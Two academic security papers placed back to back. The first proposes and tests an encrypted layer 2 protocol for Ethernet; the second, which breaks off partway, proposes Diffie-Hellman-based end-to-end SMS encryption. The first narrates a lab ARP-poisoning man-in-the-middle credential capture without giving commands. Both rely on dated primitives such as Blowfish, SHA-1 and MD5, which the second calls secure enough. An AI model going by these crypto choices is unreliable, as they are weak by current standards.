In this paper, we propose a new layer 2 protocol called Packet Security Protocol (PSP) to protect the confidentiality, integrity and authenticity of the IP communication in a wired Ethernet network. Our proposed solution is designed for flexibility, allowing the use of multiple encryption and hashing algorithms as well as multiple digital certificate standards. When protecting data with PSP, the EtherType field of the Ethernet frame is replaced with a new value that indicates the PSP protocol; the protected data is then encapsulated into a new PDU structure that includes the original EtherType field of the Ethernet frame and the entire IP packet, both encrypted with a symmetric key, and an integrity check value that can be either an HMAC value or a digital signature calculated over the entire Ethernet frame. Our proposed protocol also includes multiple options to protect the communication against replay attacks.

To demonstrate the proof of concept of our solution, we will develop a program in C++ that implements the new protocol on a Linux operating system. This demonstration will be based on a methodology consisting of two parts. First, we will analyze the security of our proposed protocol by performing different attacks to compromise the communication between two hosts, and then protecting the same communication with our solution; we will also analyze the impact on security of using different modes of operation of a block cipher. Second, we will run multiple tests on 4 different protocols to measure the performance of the network and of the hosts using our proposed solution.

II. RELATED WORK

Research and development of protocols and techniques to protect, at layer 2 of the OSI model, the confidentiality or integrity of the information transmitted over a wired network spans several solutions that, to our understanding, do not offer complete protection of the information.

The Point to Point Protocol (PPP) is a well-known solution used to transmit other protocols’ packets over a point-to-point link. Several methods have been defined to extend the functionality of this protocol, including the ability to encrypt the entire encapsulated packet as specified in the PPP Encryption Control Protocol (ECP) [9]. This protocol defines a standard method to encrypt information in a PPP link and is open to any encryption algorithm, but it does not specify any method to protect the integrity or authenticity of the information being transmitted, providing only confidentiality protection [9]. Another disadvantage of ECP is that it can be used only after the Link Establishment Phase and the Authentication Phase of the PPP protocol, and not before. This means that an attacker can sniff the entire link establishment phase of PPP in clear text and launch attacks to prevent a successful link negotiation.

The IEEE developed the IEEE 802.1AE standard, known as the Media Access Control Security (MACsec) standard for local and metropolitan area networks. It provides confidentiality and integrity protection between trusted network hosts. MACsec uses the term MAC Security Entity (SecY) for the host or network element that uses MACsec, and Secure Association Key (SAK) for the secret key used between two hosts that have established a Secure Association [2]. Even though MACsec defines encryption and integrity protection, it has to rely on the standard IEEE 802.1X-2010 for authentication and key management [3].

MACsec combined with IEEE 802.1X-2010 offers good protection for layer 2 frames; however, it must be supported by the physical hardware of the network, including network switches. This condition may force an investment in new hardware, limiting the number of scenarios where it can be adopted.

Yves Igor Jerschow, Christian Lochert, Björn Scheuermann and Martin Mauve [4] proposed a protocol called Cryptographic Link Layer (CLL) which provides authentication, integrity, confidentiality and replay attack protection to IP packets in the link layer. The Cryptographic Link Layer relies on digital certificates and HMAC values to authenticate the frames transmitted by a host. In the case of digital certificates, the certificate binds the MAC and IP address of the host, and the receiver can always validate the authenticity of the frame based on these parameters.

CLL uses timestamps to protect the ARP and security association packets from replay attacks. It also relies exclusively on digital certificates to authenticate ARP, DHCP and broadcast packets and provides no other way to authenticate them. CLL offers no option to disable timestamps or digital certificates, which requires the network to have a certificate authority and a way to keep all host clocks synchronized. These two requirements, depending on the scenario, can significantly increase the administrative burden of the network.

CLL offers optional confidentiality protection: only unicast IP packets can be encrypted, and only after two hosts have established a security association. CLL does not offer the option to encrypt ARP, DHCP or broadcast packets, which allows eavesdroppers to always know the type of traffic being transmitted, along with the IP addresses and all other fields of the IP headers of the packets.

III. PROBLEM STATEMENT

Data communication between two hosts is based on the OSI and TCP/IP layered models [11]. If a layer is protected but then encapsulated into a less secure layer, a weak link is created in the security of the communication, giving attackers the opportunity to gain knowledge of the network, disrupt the communication, cause a denial of service, impersonate one of the involved parties or steal information. This is exactly the problem that exists in wired Ethernet networks. Security protocols such as IPsec, SSH or TLS can protect the transmitted data; however, this protection occurs in the network and upper layers of the OSI model [7], leaving the EtherType field of the Ethernet frames and the header of the IP packets exposed in clear text, without any confidentiality or integrity protection. Timo Kiravuo, Särelä, and Jukka Manner [12] list ARP and DHCP poisoning, Man in the Middle attacks and session hijacking as possible attacks that can affect communication in an Ethernet segment. These attacks take advantage of the lack of confidentiality and integrity protection of the IP packet, including information disclosed in the IP header.

In the case of ARP poisoning, the ARP protocol was not designed with security in mind [13], and the fact that any host in the network can send ARP request packets and receive ARP reply packets in clear text from any other host makes this protocol an easy target for an attacker.

Similar to ARP, the DHCP protocol suffers from the same lack of security in its design [14, 15]; it is vulnerable to several attacks because its messages are sent in clear text and the protocol has no authentication of message origins [14].

We also make reference to Kenneth G. Paterson and Arnold K. L. Yau [16], and to Kenneth G. Paterson and Jean Paul Degabriele [17], who demonstrated several attacks that allow compromising the information transmitted over an IPSec tunnel using ESP encryption without integrity protection. Dongxiang Fang, Peifeng Zeng and Weiqin Yang [18] took the idea presented in [17] and adapted it to work on IPv6. The attacks presented in [16, 17, 18] are possible because attackers can access an unencrypted IP header and can tamper with the captured packets, since these are not integrity protected.

IV. PACKET SECURITY PROTOCOL

In this paper, we propose the creation of a new layer 2 protocol that will provide a secure transmission preserving the confidentiality, integrity and authenticity of the information sent over a wired Ethernet network. From this point on, we will refer to our proposed protocol as Packet Security Protocol or PSP.

As a way to protect the IP communication and avoid attacks based on information disclosed by fields sent in clear text, packet injection or data tampering, PSP encrypts the value of the EtherType field and the whole network packet and encapsulates them into a new protocol data unit (PDU) that contains a new header, the encrypted data and an integrity check value calculated for the entire layer 2 frame.

Taking the OSI model as a reference in a regular data network communication, layer 3 packets are encapsulated into a layer 2 frame and then transmitted over a physical medium. As shown in Fig. 1, PSP respects and works together with the traditional encapsulation process, but instead of encapsulating the network packet directly into a layer 2 frame, it is first encapsulated into the PSP Protocol Data Unit, and then this PSP PDU is encapsulated into a layer 2 frame before being transmitted over a physical medium.

Fig. 1. PSP Encapsulation

By default, PSP encrypts the data with a shared symmetric key using the Blowfish encryption algorithm in Cipher Block Chaining mode, and calculates an HMAC value using the SHA-1 hashing algorithm to protect the integrity and authenticity of the frame; however, it’s open to support other encryption and hashing algorithms as well as digital certificate standards.

V. PDU STRUCTURE

The PSP Protocol Data Unit (PDU) is composed of 3 sections as depicted in Fig. 2: clear text header, encrypted payload and integrity check value.

Fig. 2. PDU Structure

The clear text header has information about the PSP version and the different security parameters used to protect the data.

The encrypted section guarantees the confidentiality of the protected data. It contains a sub header, the protected data and padding bytes necessary to complete a block size when a block cipher is used for encryption. All fields in this section are encrypted with a defined cryptographic key using an encryption algorithm and can only be extracted or analyzed once the section has been decrypted. The original value of the EtherType field and the entire layer 3 packet are contained within this section.

The integrity check value (ICV) section guarantees the integrity and authenticity of the frame. This section contains either an HMAC value or a Digital Signature calculated for the entire layer 2 frame, but not both.

VI. PSP COMMUNICATION PROCESS

PSP works at layer 2 of the OSI model. It must be configured, along with a common default Pre-Shared Symmetric Key, on all devices that will talk directly to each other in a communication network. All data transmitted over the network, including unicast, broadcast and multicast messages, is protected for confidentiality, integrity and authenticity.

The communication between 2 devices that are protected with PSP involves a process of three sequential steps: Address Mapping, Communication Session Establishment, and Session Key Mapping.

The first step is to map the network address of the peer host to its hardware address. This is accomplished using the ARP protocol or any other mechanism that maps network and hardware addresses. Up to this point, all packets sent over the network are encrypted, and their integrity and authenticity values are calculated, using the default pre-shared symmetric key. Once the address mapping is done, PSP uses a Session Establishment Protocol to establish a communication session and exchange data with the peer host; during this process, a new session key that is unique to both devices is created to encrypt the communication and avoid further use of the default Pre-Shared Symmetric Key. After the communication session has been established, both hosts perform a Session Key to Hardware Address Mapping. By creating an association between a session key and the hardware address of the peer, a device knows which session key and parameters to use to decrypt or encrypt data.


VII. IMPLEMENTATION OF THE PROPOSED SOLUTION

We have developed a computer program in C++ to demonstrate the proof of concept of our proposed solution. This demonstration was based on a methodology consisting of a security analysis and a performance analysis. First, we analyzed the security of our proposed protocol by performing different attacks to compromise the communication between two hosts, and then protecting the same communication with our solution; we also analyzed the impact on security of using different modes of operation of a block cipher. Second, we ran multiple tests on 4 different protocols and applications to measure the performance of the network and of the hosts using our proposed solution.

A. Network Scenario

As depicted in Fig. 3, our network scenario consists of three virtual machines – a network protocol analyzer capturing traffic for data analysis purposes, one client and one server, all running the proposed Packet Security Protocol – connected to a virtual switch configured in promiscuous mode. An attacker not running the proposed Packet Security Protocol is connected to the same virtual switch and sniffs the traffic of the network.

Fig. 3. Network Scenario

B. Test Categories and Tested Protocols

The following test categories were used in this test methodology:

1) Ethernet without PSP applied. TOE disabled: The purpose of this category is to establish a baseline and a reference for all tests. Network protocols and services tested in the other categories were compared against this one to show the network and system performance variation caused by the proposed Packet Security Protocol.

In this category, all tests were conducted in a regular scenario where data is sent over the network with no encryption or manipulation of the payload or the layer 3 and layer 2 headers. The network adapters of the client and the server had the TCP Offloading Engine (TOE), a feature of some network adapters that offloads TCP segment processing to the adapter to improve CPU usage [10], disabled to mimic a regular network card. This is the most common scenario in today's network environments.

Protocols tested under this category: ARP, ICMP, VoIP and Iperf-TCP.

2) Ethernet without PSP applied. TOE enabled: In this category, all tests were conducted in a regular scenario where data is sent over the network with no encryption or manipulation of the payload or the layer 3 and layer 2 headers. The network adapter had the TCP Offloading Engine (TOE) enabled.

The purpose of this category is to measure the impact of enabling vs. disabling TOE on TCP-related tests, and how the advantages of enabling TOE are compromised by the proposed Packet Security Protocol. This includes CPU and bandwidth usage.

Protocols and services tested under this category: Iperf-TCP.

3) PSP-NoENC-NoHMAC: This category measures the impact on network and system performance of using the Packet Security Protocol without encryption and HMAC calculation. Even though the proposed protocol is not meant to be used without encryption and HMAC calculation, this category shows the processing overhead caused by the program developed to prove the concept of the Packet Security Protocol.

Protocols and services tested under this category: ARP, ICMP, VoIP and Iperf-TCP.

4) PSP Full: This category measures the real performance of the Packet Security Protocol, just as proposed in this paper, with encryption and HMAC capabilities. The results of the tests run in this category show the real processing overhead added by the proposed protocol and the computer program developed to prove the concept of the protocol.

C. Hardware and Software Specifications

1) Physical Machine Hosting the Virtual Machines: Cisco UCS-C220-M3 Server with 2 Intel(R) Xeon(R) CPU E5-2650 @ 2.0 GHz, 32 GB RAM, RAID 1 with two 10,000 RPM 300 GB Seagate ST9300605SS SAS HDDs, integrated dual-port Gigabit Ethernet, VMware ESXi v5.1.

2) Virtual Environment: Virtual machines running on VMware ESXi v5.1. Each VM had the following specs: 2 x vCPU Intel(R) Xeon(R) CPU E5-2650 @ 2.0 GHz, 4 GB RAM, 1 x Gigabit Ethernet interface, Ubuntu Linux Desktop 12.04.2 LTS x64, kernel 3.5.0-23-generic.

D. Developed Program

We developed a program in C++ to test the concept of the proposed Packet Security Protocol (PSP) on Ubuntu Linux. This program assumes that the communication session has already been established and encrypts the data using a defined static pre-shared key. It uses Blowfish in Cipher-Block Chaining (CBC) mode as the encryption algorithm and calculates the HMAC value of the frame using the SHA-1 function.

10th ANNUAL SYMPOSIUM ON INFORMATION ASSURANCE (ASIA '15), JUNE 2-3, 2015, ALBANY, NY

ASIA '15 63

VIII. TEST RESULTS

A. Security Analysis

This security analysis explores whether known network attacks can be avoided using our solution. It also examines the possible security implications of using our solution with a block cipher in Electronic Codebook (ECB) mode.

1) ARP Spoofing and Man in the Middle Attack: We performed an ARP spoofing and Man in the Middle attack to route the traffic of the affected hosts to an SSH honeypot installed on our attacking station and capture user credentials for the real server. This attack was first performed against an unprotected network to show how vulnerable a wired Ethernet network can be; we later performed the same attack against the network protected with our solution to test whether the attack can be avoided.

First, we ran Wireshark to sniff the network and discover the IP addressing scheme based on ARP broadcast messages. Next, we started Kippo, an SSH honeypot, on our attacking station. With the SSH honeypot up and running, we used Ettercap to sniff the network and perform an ARP poisoning and Man in the Middle attack against the discovered machines which, in this case, were a client and an SSH server.

After performing the attacks, we were able to manipulate all traffic between the affected machines. We redirected all SSH traffic from the client host to our SSH honeypot and started to log the user’s login attempts on what he thought was the real SSH server.

Later, we protected the network with our solution and tried to replicate the same ARP poisoning and Man in the Middle attacks. The frames captured by Wireshark from our attacking station did not disclose any useful information that would allow us to detect the encapsulated protocols or the IP addressing scheme of the network. The client and the server machines, when running our proposed protocol, only understood traffic that was protected with our solution, not regular traffic in clear text.

It was impossible for us to replicate the attacks on the hosts protected with our Packet Security Protocol.

2) Vulnerabilities Derived From a Block Cipher in Electronic Codebook Mode: For this study, we captured an ARP-ICMP communication between a client and a server protected with our proposed protocol.

Fig. 4. Data Encrypted Using Block Cipher in ECB Mode

When a block cipher in Electronic Codebook (ECB) mode is used, patterns in the encrypted data are created and an attacker can extract more information from the captured frames. The frames captured by the attacker and depicted in Fig. 4 were protected with PSP, but the data was encrypted using a block cipher in ECB mode. We can see a repetitive pattern of 56 bytes in the encrypted section of both the client-to-server and server-to-client frames. An attacker could use this pattern to his advantage and, employing brute force or other mechanisms, could decrypt the data. This is not a vulnerability of the proposed Packet Security Protocol, but a property of the encryption mode that works in the attacker's favor.

B. Performance Analysis

This analysis shows how network and host performance is impacted by the Packet Security Protocol. The performance efficiency of the protocol is based on the efficiency of the program we developed to prove the concept of our solution.

1) ARP-ICMP: The purpose of these tests was to measure the Round Trip Time (RTT) of the Address Resolution Protocol (ARP) and the Internet Control Message Protocol (ICMP).

Looking at the test results of 3-PSP-FULL depicted in Fig. 5, we see that PSP and our developed program increased the RTT of ARP by 100.71% and of ICMP by 117%. If we calculate the difference between 3-PSP-FULL and 2-PSP-noENC-noHMAC, we can establish the overhead caused by the encryption/decryption and HMAC modules: 81.48% for ARP and 89.79% for ICMP.

Fig. 5. Round Trip Time of ARP and ICMP

These results correlate with the fact that ICMP frames are larger than ARP frames, resulting in more CPU processing for frame construction and encryption.

2) VoIP: This test measured the performance of the proposed Packet Security Protocol with Voice over IP applications. We used Asterisk v11.3.0 as our Voice over IP server and the SIPp program to simulate SIP calls and RTP sessions.


The test consisted of generating, for 60 seconds, up to 100 simultaneous calls at a rate of 8 calls per second from SIPp to an Asterisk SIP extension using the G.711 codec. This call rate was the maximum supported by our test environment without dropping any calls in a regular Ethernet communication.

Test categories 1-Ethernet and 2-PSP-noENC-noHMAC achieved 100% successful calls. In the case of the proposed Packet Security Protocol and the developed program (3-PSP-FULL), only 9 calls out of 485 failed, for a total of 98.14% successful calls.

System performance was not highly impacted: the developed program used a maximum of 27.4% of CPU time (3-PSP-FULL). Because the network transfer rate was relatively low (586 KB/s), PSP did not have to encrypt/decrypt and calculate HMAC values for a large number of packets.

3) Iperf-TCP: This test measured the performance of the TCP protocol protected with the Packet Security Protocol.

To complete this test, we used Iperf with all default settings: a TCP window size of 85.3 KByte and a test duration of 10 seconds.

Fig. 6. Iperf-TCP Performance

We used test category 1-Ethernet as our baseline for all other results. In this scenario, the results of categories 3-PSP-noENC-noHMAC and 4-PSP-FULL showed, as depicted in Fig. 6, very low performance compared to test category 1-Ethernet. Our developed program (test category 4-PSP-FULL) reached only 3.42% of the network throughput of our baseline, while test category 3-PSP-noENC-noHMAC reached only 30.69%. These results are very different from our findings in the previous tests, but what the ARP-ICMP tests hinted at about the developed program can now be confirmed: the higher the network traffic, the lower the network performance.

This test gave us much information about the performance of the proposed Packet Security Protocol and the developed program. The results of category 3-PSP-noENC-noHMAC showed that the developed application reduces network performance by almost 70%. This worsened when the encryption/decryption and HMAC algorithms were used, reducing network performance by almost 97%.

The developed program (test category 4-PSP-FULL) not only resulted in low network performance but in high CPU usage as well, using more than 90% of CPU time. From this result we estimate that high network traffic protected by PSP will result in high CPU usage, because the application has to encrypt/decrypt and calculate HMAC values at a very high rate.

IX. CONCLUSION

In this paper, we proposed a new layer 2 protocol called Packet Security Protocol (PSP) to protect the confidentiality, integrity and authenticity of the IP communication in a wired Ethernet network.

We ran several tests to analyze the security characteristics and performance impact of our proposed solution. The test results demonstrated that the Packet Security Protocol can effectively protect the network communication between two hosts and prevent network attacks based on packet injection, data tampering, or information disclosure, not only for IP packets but for any protocol encapsulated in layer 2 frames, because the original EtherType field and the layer 3 data are encrypted and the entire Ethernet frame is integrity protected. It was also demonstrated that choosing a vulnerable cipher increases the chances of breaking the confidentiality protection offered by our protocol, as was the case in our experiments with a block cipher in ECB mode. The test results also showed that high network traffic protected with our solution can reduce network transfer rates and raise CPU utilization due to the processing overhead imposed by encrypting/decrypting data and calculating the integrity check. Our findings also indicated that the TCP offloading engines used in today's network cards will be rendered useless for TCP communication protected with PSP, unless the firmware of these engines can be updated to use our proposed protocol.

Applying security to data communication in a network environment involves a trade-off, mostly reflected in increased network administration tasks, monetary investment, and reduced network or host performance. Security must be analyzed thoroughly based on the real needs of the business and the different information security risks to which it is exposed.

REFERENCES

[1] T. Hardjono and L. Dondeti, Security in Wireless LANs and MANs. Norwood, MA: Artech House, 2005, pp. 131-141, 143-154.

[2] IEEE Standard for Local and Metropolitan Area Networks: Media Access Control Security, IEEE Std 802.1AE, 2006.

[3] IEEE Standard for Local and Metropolitan Area Networks: Port-Based Network Access Control, IEEE Std 802.1X-2010, 2010.

[4] Y.I. Jerschow, C. Lochert, B. Scheuermann and M. Mauve. “CLL: a cryptographic link layer for local area networks.” Security and Cryptography for Networks, vol. 5229, pp. 21-38, 2008.

[5] C. Kozierok, The TCP/IP Guide. San Francisco, CA: No Starch Press, 2005, p. 236.

[6] C. Kozierok, The TCP/IP Guide. San Francisco, CA: No Starch Press, 2005, p. 330.

[7] P. Loshin, TCP/IP Clearly Explained. San Francisco, CA: Morgan Kaufmann Publishers, 2003, pp. 335-338, 551-580.

10th ANNUAL SYMPOSIUM ON INFORMATION ASSURANCE (ASIA '15), JUNE 2-3, 2015, ALBANY, NY

ASIA '15 65

[8] P. Loshin, TCP/IP Clearly Explained. San Francisco, CA: Morgan Kaufmann Publishers, 2003, p.551

[9] G. Meyer, The PPP Encryption Control Protocol (ECP). RFC 1968. June 1996.

[10] B. Sosinsky, Networking Bible. Indianapolis, IN: Wiley Publishing, Inc, 2009, pp. 437-440.

[11] B. Sosinsky, Networking Bible. Indianapolis, IN: Wiley Publishing, Inc, 2009, pp. 23-34.

[12] T. Kiravuo, M. Sarela and J. Manner. "A survey of ethernet LAN security." IEEE Communications Surveys & Tutorials, vol. 15, pp. 1477-1491, 2013.

[13] P. Pandey. "Prevention of ARP spoofing: a probe packet based technique." 2013 3rd IEEE International Advance Computing Conference (IACC), pp. 147-153, 2013.

[14] S. Duangphasuk, S. Kungpisdan and S. Hankla. "Design and implementation of improved security protocols for DHCP using digital certificates." 2011 17th IEEE International Conference on Networks, pp. 287-292, 2011.

[15] M. Yaibuates and R. Chaisricharoen. "ICMP based malicious attack identification method for DHCP." The 4th Joint International Conference on Information and Communication Technology, Electronic and Electrical Engineering (JICTEE), pp. 1-5, 2014.

[16] K. G. Paterson and A. K. L. Yau. "Cryptography in theory and practice: the case of encryption in IPSec." Advances in Cryptology - EUROCRYPT 2006, vol. 4004, pp. 12-29, 2006.

[17] J.P. Degabriele and K. G. Paterson. "Attacking the IPsec standards in encryption-only configurations." 2007 IEEE Symposium on Security and Privacy (SP '07), pp. 335-349, 2007.

[18] D. Fang, P. Zeng and W. Yang. "Attacking the IPsec standards when applied to IPv6 in confidentiality-only ESP tunnel mode." 16th International Conference on Advanced Communication Technology, pp. 401-405, 2014.


Proposed Terminal Device for End-to-End Secure SMS in Cellular Networks

Neetesh Saxena
Department of Computer Science, SUNY Korea, Incheon, South Korea
Department of Computer Science, Stony Brook University, New York, USA
Email: [email protected]

Narendra S. Chaudhari
Department of Computer Science and Engineering, Visvesvaraya National Institute of Technology, India
Discipline of Computer Science and Engineering, Indian Institute of Technology Indore, India
Email: [email protected]

Abstract—Nowadays, SMS is a very popular mobile service, used efficiently even by poor, illiterate, and rural populations. Although many mobile operators have already started 3G and 4G services, 2G services are still used in many countries. In 2G (GSM), the only encryption provided is between the MS and the BTS; there is no end-to-end encryption available. We often need to send confidential messages containing bank account numbers, passwords, financial details, etc. Normally, a message is sent to the recipient in plain text only, which is not an acceptable standard for transmitting such important and confidential information. The authors propose an end-to-end encryption approach by proposing a terminal for sending/receiving secure messages. An asymmetric key exchange algorithm is used to transmit the shared secret key securely to the recipient. The proposed approach with the terminal device provides authentication, confidentiality, integrity, and non-repudiation.

Keywords—SMS, GSM, GSM terminal, encryption, non-repudiation

I. INTRODUCTION

SMS messages are currently one of the most widespread forms of communication. SMS is a store-and-forward, easy-to-use, popular, and low-cost service. There are many unusual applications, such as devices that allow house heating systems to be switched on and off by SMS [1], requests for public transport service in Asia [2], payment applications that have been widely accepted in Europe and Asia [3], reminders for tuberculosis medication [4], a general health care reminder system [5], and selling theatre tickets [6]. SMS enables the transmission of alphanumeric messages of up to 1120 bits between mobile phones and external systems. It uses an SMS center for routing within one network, and messages can be transmitted into another network through an SMS gateway [7]. SMS usage is threatened by security concerns [8], such as eavesdropping, interception, and modification.

SMS messages are transmitted as plaintext between the mobile stations and the SMS center over the wireless network. SMS content is stored in the systems of the network operators and can easily be read by their personnel. The A5 algorithm, the GSM standard for encrypting transmitted data, can easily be compromised. Tapping an SMS from the radio broadcast, as it is sent or received between a mobile phone and a base transceiver station (BTS), is not easy. However, when a user is roaming, the SMS content passes through different networks, and perhaps the Internet, which exposes it to various vulnerabilities and attacks. To exploit the popularity of SMS as a serious business bearer protocol, it is necessary to enhance its functionality to offer secure transaction capability. Data confidentiality, integrity, authentication, and non-repudiation are the most important security services that should be taken into account in secure applications. However, these requirements are not provided by traditional SMS messaging.

II. LITERATURE REVIEW

This section describes related work from previous years on encryption and key handling in the GSM network.

Encryption: Many authors have used different encryption techniques to provide confidentiality for transmitted SMS messages. Lisonek and Drahansky [9] explained that the RSA encryption scheme can secure an SMS of fewer than 1120 bits if a suitable padding scheme is used. Toorani and Shirazi [10] proposed an SMS protocol that uses the ECDLP to provide confidentiality for an SMS m-payment system. Zhao et al. [11] explain the use of identity-based cryptography for securing mobile messaging. Harb et al. [12] use a 3DES session key to secure SMS. Garza-Saldana and Diaz-Perez [13] explained how symmetric encryption can provide confidentiality for an SMS mobile payment protocol. Kuaté et al. [14] presented the implementation of an SMS security protocol called SMSSec, which uses both asymmetric and symmetric encryption to provide confidentiality for SMS.

Key Management: Public-key encryption is based on mathematical functions, is computationally intensive, and is not very efficient for small mobile devices [15]. Asymmetric encryption techniques are almost 1000 times slower than symmetric techniques because they require more computational processing power [16]. The disadvantage of the proposed model (explained later) is the need to exchange symmetric encryption keys via a secure channel: the session secret key is generated at one MS and must be transferred to the other MS. There is no key establishment (management) protocol in GSM. Each Subscriber Identity Module (SIM) is burnt with a unique shared key, which is also stored in the


Authentication Centre (AuC). The AuC stores the keys for all subscribers of a particular mobile switching centre (MSC). Both the SIM and the AuC share the same key; thus symmetric-key cryptography is used to achieve one-way authentication of the Mobile Equipment SIM (ME-SIM) by the network using a challenge-response scheme. Like GSM, UMTS also provides no key management or establishment protocols and employs pre-shared secret keys [17].

III. EXISTING CELLULAR ARCHITECTURE

This section starts with the basic terminology of the GSM network. Fig. 1 shows the basic architecture of GSM. The Base Transceiver Station (BTS) translates the radio signals into digital format and transfers them to the Base Station Controller (BSC), which controls multiple BTSs within a small geographical area. The BSC forwards the received signals to the Mobile Switching Centre (MSC). The MSC interrogates its databases, the Home and Visitor Location Registers (HLR and VLR), for location information about the destination mobile handset. If the signal originates or terminates at the fixed telephone network, it is routed from the MSC to the SMS Gateway MSC (SMS GMSC). If the received signal is an SMS, the message is stored in the Short Message Service Centre (SMSC) and waits to be delivered. Even after the SMS is delivered, the message content remains in the SMSC persistent database.

If the signal needs to be redirected internationally, it is routed via the International Switching Centre (ISC) to the other country. Maintenance is controlled by the Operation and Management Centre (OMC). The Equipment Identity Register (EIR) and Authentication Centre (AuC) databases are used for equipment verification and user authentication. The security mechanisms (for voice and data communication) of GSM are implemented in three different system elements: the Subscriber Identity Module (SIM), the GSM handset or MS, and the GSM network. The main focus of this paper is to provide end-to-end security of the message during communication; the authors also focus on the key management schemes and the encryption approach used. End-to-end encryption provides encryption security between sender and receiver. Currently, no such complete security solution exists; the only over-the-air security provided is between the MS and the BTS. The message travels as plaintext from the BTS to the SMSC in the GSM network, which can result in disclosure of message content by the operator and in various threats and attacks by intruders on the data transmitted from the MS.

Fig. 1. GSM Architecture

IV. PROPOSED SECURE APPROACH

Many security attacks exist on SMS, such as man-in-the-middle, replay, repudiation, and message disclosure. The proposed approach provides authentication, confidentiality, integrity, and non-repudiation for the transmitted message. We recommend that the encryption algorithms be stored on the SIM. Adding extra security increases cost, so the authors also propose to include one more service, 'Secure Message', in the menu of the mobile software developed by the various mobile companies, as shown in Fig. 2. Mobile operators can charge their customers extra to send these SMS(s). First, user as well as network (mutual) authentication takes place, similar to that described in [22], unlike in the existing GSM network where only unidirectional authentication is provided. Whenever a user wants to send a Secure Message to another user, the key management algorithm first executes to generate a secret shared key, and then the message is encrypted with symmetric cryptography.

Fig. 2. Secure Message added in Menu

A. Key Management Process

Key management is handled with the Diffie-Hellman and Elliptic Curve Diffie-Hellman key exchange algorithms.

Diffie-Hellman Key Exchange: It is assumed that the global public elements, a prime number q and one of its primitive roots a (where a < q), are known to all authorized MS. These values may vary from one mobile operator to another. If the global parameters differ between operators, it is assumed that the global elements of the sender MS's network are used for communication between MS on different networks, and it is the mobile operators' responsibility to provision such secure global parameters among themselves.

Now, both MS generate new secret private keys from their Kc (as Kc is stored in the SIM and was used in the authentication process); let us call them x1 and x2 respectively, where x1 < q and x2 < q. Next, both MS calculate their public keys y1 and y2 respectively:

y1 = a^x1 mod q, and y2 = a^x2 mod q.

Both MS exchange their public keys y1 and y2 as shown in Fig. 3, but exchanging data over an insecure medium is a challenge. Now the secret shared key k can be generated at MS1 and MS2 as

K = (y2)^x1 mod q, and K = (y1)^x2 mod q.

This secret key k is used to encrypt and decrypt messages between the sender MS and the receiver MS. However, this approach is vulnerable to a man-in-the-middle attack.
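The basic exchange can be sketched in a few lines of Python. The small Mersenne prime and generator below are toy stand-ins for the operator-provisioned global parameters, and random values replace the Kc-derived private keys; both sides arrive at the same k regardless of the parameter choice.

```python
import secrets

# Toy global parameters: a 127-bit Mersenne prime and a small generator.
# A real deployment would use a standardized large safe-prime group.
q = 2**127 - 1
a = 3

x1 = secrets.randbelow(q - 2) + 1   # MS1's private key (Kc-derived in the proposal)
x2 = secrets.randbelow(q - 2) + 1   # MS2's private key

y1 = pow(a, x1, q)                  # public keys exchanged over the air
y2 = pow(a, x2, q)

k1 = pow(y2, x1, q)                 # computed at MS1: (y2)^x1 mod q
k2 = pow(y1, x2, q)                 # computed at MS2: (y1)^x2 mod q
assert k1 == k2                     # both sides now hold the shared secret k
```

Note that nothing here authenticates the peers, which is exactly why the plain exchange is open to a man-in-the-middle attack.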


Fig. 3. Public keys Exchange

As a solution, each party signs its own Diffie-Hellman (DH) value to prevent a man-in-the-middle attack (and the peer's DH value as a freshness guarantee against replay attacks). This process is shown in Fig. 4. MS2 concatenates the pair (y1, y2), signs it using MS2's digital signature, encrypts it with k, and then sends the ciphertext along with y2 to MS1. MS1 decrypts and verifies MS2's signature. Similarly, MS1 concatenates the pair (y2, y1), signs it using MS1's digital signature, encrypts it with k, and then sends the ciphertext to MS2. MS2 decrypts and verifies MS1's signature. MS1 and MS2 are now mutually authenticated and hold a shared secret key k. A discussion of the different digital signature approaches and their key management is outside the scope of this paper. However, this approach is still vulnerable to an identity misbinding attack. Consider a situation like Fig. 5, with an attacker A: here A does not know k, but MS2 treats anything sent by MS1 as coming from attacker A. One solution is shown in Fig. 6, where the digital signature is created over (y1, y2, and the MS identity); the signature is generated with the MS's private key and verified with its public key. Attacker A can generate neither SIG(y1, y2, MS1) nor SIG(y2, y1, MS2), which can only be generated by MS1 and MS2 respectively. One remaining possibility is for the attacker A to replace the value of y1, which raises integrity issues. To maintain integrity in the communication between MS1 and MS2, a hash function is used to create message digests of the data being sent, y1 and (y1, y2), as H(y1) and H(y1, y2) respectively; MD5 or SHA1 can be used as an efficient hash function. This process, shown in Fig. 7, is secure enough for key management.

Fig. 4. Added Signature to DH

Fig. 5. Identity Misbinding Attack by Attacker ‘A’

Fig. 6. Solution to Identity Misbinding Attack

Fig. 7. Secure Data Exchange in DH with Integrity
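The digest step of the hardened exchange can be sketched with Python's hashlib. This shows only the integrity check H(y1) and H(y1, y2); the actual scheme additionally signs these values with the MS's private key, and the placeholder y1, y2 values and the big-endian encoding are assumptions for illustration.

```python
import hashlib

def H(*values: int) -> bytes:
    """SHA-1 digest over the concatenated big-endian encodings of the values."""
    h = hashlib.sha1()
    for v in values:
        h.update(v.to_bytes((v.bit_length() + 7) // 8 or 1, "big"))
    return h.digest()

y1, y2 = 0x1234, 0x5678          # placeholder public values from the DH exchange

msg1 = (y1, H(y1))               # MS1 -> MS2: y1 accompanied by its digest
msg2 = (y2, H(y1, y2))           # MS2 -> MS1: digest binding both values together

# Receiver-side checks: a y1 substituted in transit no longer matches the digest.
assert msg1[1] == H(y1)
assert msg2[1] == H(y1, y2)
assert H(y1 + 1) != H(y1)        # any modification of y1 is detected
```

Binding both public values into one digest is what ties each party's contribution to the full exchange rather than to a single, replaceable value.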

Elliptic Curve Diffie–Hellman Key Exchange: Another approach to key exchange uses the Elliptic Curve Diffie–Hellman protocol (ECDH), which allows two parties, each holding an elliptic-curve public-private key pair, to establish a shared secret over an insecure channel; this shared secret may be used directly as a key. Each party must have a key pair suitable for elliptic curve cryptography, consisting of a private key d, a randomly selected integer in the interval [1, n-1], and a public key Q, where Q = d*G. Now both MS generate new secret private keys from their Kc (as Kc is stored in the SIM and was used in the authentication process); let us call them d1 and d2 respectively, where d1, d2 ∈ [1, n-1]. Let MS1's key pair be (d1, Q1) and MS2's key pair be (d2, Q2), where Q1 = d1*G and Q2 = d2*G are the public keys of MS1 and MS2 respectively. These public values are exchanged between MS1 and MS2 as shown in Fig. 8. After the exchange, MS1 computes (Xk, Yk) = d1*Q2 and MS2 computes (Xk, Yk) = d2*Q1. Here Xk is the shared secret key, generated at both MS1 and MS2, since d1*Q2 = d1*d2*G = d2*d1*G = d2*Q1.

Fig. 8. Secure Data Exchange in ECDH with Integrity

